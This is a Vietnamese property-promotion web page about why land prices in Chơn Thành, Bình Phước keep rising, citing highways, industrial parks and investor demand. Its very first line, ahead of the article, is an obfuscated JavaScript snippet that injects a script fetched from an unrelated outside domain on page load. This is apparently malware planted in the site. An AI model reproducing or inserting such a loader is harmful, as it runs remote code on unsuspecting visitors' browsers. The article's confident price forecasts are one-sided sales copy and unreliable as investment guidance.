;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tại sao bất động sản Chơn Thành “sốt” giá liên tục?

Tại sao bất động sản Chơn Thành “sốt” giá liên tục?

Show all

Tại sao bất động sản Chơn Thành “sốt” giá liên tục?

bat-dong-san-chon-thanh

Bất động sản Chơn Thành với lợi thế về giao thông và quỹ đất rộng, nơi đây đang nổi lên như một huyện công nghiệp của tỉnh Bình Phước với nhiều dự án đầu tư khủng.

Trong khi đó các dự án đất nền đúng quy chuẩn, đúng pháp lý đang hiếm dần, khiến cho thị trường bất động sản Chơn Thành, Bình Phước không ngừng tăng nhiệt.

Chơn Thành sở hữu vị trí đắc địa

Vị trí tiếp giáp: Hướng Đông giáp Huyện Dầu Tiếng (Bình Dương); Hướng Tây giáp Thị xã Đồng Xoài; Hướng Nam giáp Huyện Bàu Bàng (Bình Dương); Cuối cùng hướng Bắc giáp Thị xã Bình Long.

Trong tương lai Chơn Thành còn có tuyến đường sắt TP. HCM – cửa khẩu Hoa Lư chạy ngang địa bàn. Theo đó các chính sách thu hút đầu tư hợp lý của tỉnh và địa phương sẽ giúp Chơn Thành sẽ sớm trở thành huyện công nghiệp của tỉnh Bình Phước trong nay mai.

Có thể nói Chơn Thành có vị trí địa lý rất thuận lợi với 2 tuyến đường huyết mạch là QL13 và QL14. Việc này rất thuận tiện cho việc giao thương vận chuyển hàng hóa; thúc đẩy phát triển kinh tế. Đường Hồ Chí Minh nối Chơn Thành với Đức Hòa, Long An và các tỉnh miền Tây cũng đang được hoàn thiện.

bat-dong-san-chon-thanh

Chơn Thành là địa phương đi đầu trong phát triển công nghiệp 

Trên thực tế, huyện Chơn Thành là một trong những địa phương đi đầu trong phát triển công nghiệp của tỉnh Bình Phước Năm 2017 và 2018; duy trì tốc độ tăng bình quân khoảng 18%. Kinh tế của huyện chuyển dịch theo định hướng công nghiệp hóa, hiện đại hóa. Cơ cấu kinh tế, cơ cấu lao động đã có sự chuyển dịch mạnh mẽ sang nhiều  lĩnh vực.

Đến cuối năm 2018, tổng giá trị sản xuất ngành công nghiệp và xây dựng đạt gần 10.940 tỷ đồng; gấp 3,2 lần giá trị sản xuất ngành nông nghiệp; thu ngân sách đạt 309 tỷ 326 triệu đồng; tức tăng hơn 5 lần so với năm 2004.

Chơn Thành tập trung phát triển công nghiệp

Đến nay, với các chính sách thu hút đầu tư, huyện Chơn Thành đã có 5 khu công nghiệp đi vào hoạt động: KCN Minh Hưng Hàn Quốc ( 1500ha), KCN BECAMEX ( 4.170ha), KCN Minh Hưng, KCN Minh Trung, KCN Chơn Thành. Huyện cũng thu hút hơn 62 nhà đầu tư nước ngoài và 29 doanh nghiệp trong nước đến đầu tư sản xuất kinh doanh; góp phần giải quyết việc làm cho hơn 16.000 lao động; là động lực thúc đẩy phát triển và chuyển dịch cơ cấu kinh tế.

Đặc biệt là dự án Khu liên hợp công nghiệp và đô thị Becamex Bình Phước với quy mô trên 4.633 ha. Trong đó khu công nghiệp khoảng 2.448 ha; khu dân cư, tái định cư khoảng 2.185 ha; tổng mức đầu tư bước đầu trên 20.000 tỷ đồng đang được triển khai trên địa bàn.

Cùng với các dự án công nghiệp đổ vào Chơn Thành thì việc thu hút nhân lực lao động từ các nơi về đây cũng ngày càng tăng, vì thế nhu cầu nhà ở, nhà trọ cũng tăng đột biến.

Khách hàng đầu tư đổ về tỉnh lẻ

Một vài năm gần đây sản phẩm đất nền tại TP. Hồ Chí Minh, Đồng Nai, Bình Dương ngày càng hiếm dần và giá cao ngất ngưởng. Những người kinh doanh bất động sản có kinh nghiệm cho rằng thay vì đầu tư một khoản tiền lớn vào một sản phẩm tại TP. Hồ Chí Minh thì có thể đầu tư được 3 hoặc 4 sản phẩm ở tỉnh lẻ như Bình Phước và cơ hội giao dịch sinh lời nhanh hơn. Chính vì thế, bất động sản Chơn Thành là một địa chỉ đầu tư mà không ít khách hàng ở TP. Hồ Chí Minh và Bình Dương lựa chọn.

Nắm bắt xu hướng đó, nhiều sàn giao dịch bất động sản từ TP. Hồ Chí Minh và Bình Dương cũng lập chi nhánh tại Chơn Thành và thường xuyên tổ chức đưa đón khách về đây săn lùng sản phẩm.

Đặc biệt là những khách hàng đã gặt hái được nhiều thành công trong kinh doanh khách sạn, nhà trọ gần các khu công nghiệp tại Bình Dương đến bất động sản Chơn Thành tìm đất nền tiếp tục đầu tư.

Từ những lý do trên mà thị trường bất động sản Chơn Thành chắc chắn tăng nhiệt so với chu kỳ hàng năm; dự báo sẽ còn tăng mạnh khi mà các dự án công nghiệp thu hút một lượng lớn chuyên gia và công nhân lao động đổ về.

Xem thêm:

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Tin Nổi Bật
0888 69 7779